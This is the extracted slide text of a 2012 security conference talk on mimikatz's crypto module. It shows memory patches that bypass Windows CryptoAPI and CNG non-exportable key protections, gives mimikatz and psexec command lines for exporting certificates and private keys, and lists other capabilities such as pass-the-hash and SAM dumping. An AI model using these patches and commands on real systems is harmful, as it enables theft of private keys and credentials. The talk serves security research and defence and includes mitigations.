PLAYSKOOL

Process

CryptoAPI and RSA CSP

LoadPrivate Key

DPAPI Decode

Exportable ?

yes

no

Ask to export Key

NTE_BAD_KEY_STATE

Exported Key

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcapi because i own my process
mimikatz :: crypto :: patchcapibecause I own my process
  • When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
  • This function do all the work to prepare the export, and check if the key is exportable

Exportable ?

================ Certificat 0 ================

Numéro de série : 112169417a1c3ef46a301f99385f50680fa0

Émetteur: CN=GlobalSignCodeSigning CA - G2, O=GlobalSignnv-sa, C=BE

Objet: CN=Benjamin Delpy, C=FR

Il ne s'agit pas d'un certificatracine

Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e

Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}

Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0

La cléprivéeNE PEUT PAS êtreexportée

Succès du test de cryptage

CertUtil : -exportPFXÉCHEC de la commande : 0x8009000b (-2146893813)

CertUtil: Clé non valide pour l'utilisationdansl'étatspécifié.

mimikatz # crypto::exportCertificates

Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My

- Benjamin Delpy

Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}

Provider : Microsoft Enhanced Cryptographic Provider v1.0

Type : AT_KEYEXCHANGE

Exportabilité : NON

Tailleclé : 2048

Export privédans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO

(0x8009000b) Clé non valide pour l'utilisationdansl'étatspécifié.

Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcapi because i own my process1
mimikatz :: crypto :: patchcapibecause I own my process
  • So what ? A module in my own process return that I can’t do something ?CryptoAPI is in my memory space, let’s patch it !
  • I wrote “4” bytes in my memory space

.text:0AC0B7CB 0F 85 33 C7 FF FFjnzcontinue_key_export_or_archive

.text:0AC0B7CB 90nop

.text:0AC0B7CC E933 C7 FF FFjmpcontinue_key_export_or_archive

.text:0AC1F749 0F 85B6 3B FF FFjnzcontinue_key_export_or_archive_prepare

.text:0AC1F749 90nop

.text:0AC1F74A E9B6 3B FF FFjmpcontinue_key_export_or_archive_prepare

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcapi demo time
mimikatz :: crypto :: patchcapidemo time !
  • Import, export, import as not exportable…. export

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcapi limitations
mimikatz :: crypto :: patchcapilimitations
  • Because :
    • I’m lazy
    • I’ve seen in majority of case RSA keys for real life use
      • Elliptic Curve a little…
  • mimikatz crypto::patchcapionly deal with :
    • Microsoft Base Cryptographic Provider v1.0
    • Microsoft Enhanced Cryptographic Provider v1.0
    • Microsoft Enhanced RSA and AES Cryptographic Provider
    • Microsoft RSA SChannel Cryptographic Provider
    • Microsoft Strong Cryptographic Provider
  • …all based on rsaenh.dll

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto cng how it works
mimikatz :: crypto :: cnghow it works
  • “Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
    • http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
  • “To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.
  • This time, keys operations are not made in the “user” process context
  • Process use RPC to call “Key isolation service” (keyiso) functions
  • It seems more secure than CryptoAPI…
    • It is, but it’s not perfect…

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto cng how it s exported level
mimikatz :: crypto :: cnghow it’s exported ( level)

PLAYSKOOL

NT6 System protectedprocessML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP

KeyIso Service (LSASS Process)

CNG

LoadPrivate Key

DPAPI Decode

Exportable ?

yes

no

RPC

Process

Ask to export Key

NTE_NOT_SUPPORTED

Exported Key

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcng because sometimes i own lsass
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS
  • When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey
  • This function do all the work to prepare the export, and check if the key is exportable

Exportable ?

mimikatz # crypto::exportKeys

[user] Clés CNG :

- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318

Exportabilité : NON

Tailleclé : 2048

Export privédans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO

mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opérationdemandéen'est pas prise en charge.

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcng because sometimes i own lsass1
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS
  • This time, checks and keys are in LSASS process…And what ?
  • I wrote “1” byte in LSASSmemory space…

.text:6C815210 751Cjnzshort continue_key_export

.text:6C815210 EB 1C jmp short continue_key_export

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcng demo time
mimikatz :: crypto :: patchcngdemo time !
  • Import, export, import as not exportable…. export again

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcng limitations
mimikatz :: crypto :: patchcnglimitations
  • Patch operation needs some privileges
    • Admin (debug privilege)
    • SYSTEM
  • mimikatz crypto::patchcngonly deal with :
    • Microsoft Software Key Storage Provider (maybe others algs than RSA)
  • Not a limitation of mimikatz, but MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu ?)
    • certutilcan…

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto patchcng bonus
mimikatz :: crypto :: patchcngbonus
  • After one admin patched LSASS, all users of current system benefit of extra exports
    • until reboot / KeyIsoservice restart
  • Some others programs that doesn’t check the export flag before asking export can work too
    • Yeah, like the old good one : certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfxcng_user_noexporttest.pfx

MY

================ Certificat 1 ================

[…]

Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b

Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318

Fournisseur = Microsoft Software Key Storage Provider

La cléprivée NE PEUT PAS êtreexportée

Succès du test de chiffrement

CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)

CertUtil: Clé non valide pour l'utilisationdansl'étatspécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfxcng_user_noexporttest.pfx

MY

================ Certificat 1 ================

[…]

Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b

Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318

Fournisseur = Microsoft Software Key Storage Provider

Succès du test de chiffrement

CertUtil: -exportPFX La commandes'estterminéecorrectement.

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto memo
mimikatz :: cryptomemo
  • Some commands :
    • mimikatz crypto::patchcapi crypto::exportCertificates exit
    • psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.execrypto::patchcapicrypto::patchcng"crypto::exportCertificatesCERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    • mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
    • mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificatescrypto::exportKeys exit
  • Password :
    • PFX files are protected by this password : mimikatz
  • Keys
    • When you import multiple time a certificate, exportable or not, Windows make duplicate keys
    • When you delete a certificate, Windows does not delete its private key… funny isn’t it ?
      • So yes, mimikatz can export it

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto what we can do
mimikatz :: cryptowhat we can do ?
  • Exactly the same as for sekurlsa, it will prevent access to accounts / computer !
    • no admin, no admin, no admin…
  • Basics
    • Use smartcards/token for users certificates
    • Use Hardware Security Modules (HSM), even SoftHSM
  • More in depth
    • See what Microsoft can do with TPM from Windows 8
      • Virtual SmartCard seems promising
    • Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP
      • Their biometrics stuff was a little buggy ;)

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz what else can it do
mimikatzwhat else can it do ?
  • Play with minesweeper
  • Manipulate some handles
  • Pass the hash
  • Dump SAM / AD
  • Stop event monitoring
  • Patch Terminal Server
  • Basic GPO bypass
  • Applocker / SRP bypass
  • Driver
    • Play with tokens & privileges
    • Display SSDT x86 & x64
    • List minifilters actions
    • List Notifications (process / thread / image / registry)
    • List Objects hooks and procedures

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz that s all folks
mimikatzthat’s all folks !
  • Thanks’ to / Merci à :
    • my girlfriend for her support (her LSASS crashed few times)
    • Application Security Forum to offer me this great opportunity
      • Partners and Sponsors for sure !
    • Microsoft to always consider it as normal/acceptable
    • Security friends/community for their ideas & challenges
      • nagual, newsoft, mubix, …
    • You, for your attention !
  • Questions ?

Don’t be shy ;)

especially if you have written the corresponding slide number

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

blog source code contact
Blog, Source Code & Contact
  • blog http://blog.gentilkiwi.com
  • mimikatzhttp://blog.gentilkiwi.com/mimikatz
  • sourcehttps://code.google.com/p/mimikatz/
  • email benjamin@gentilkiwi.com

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com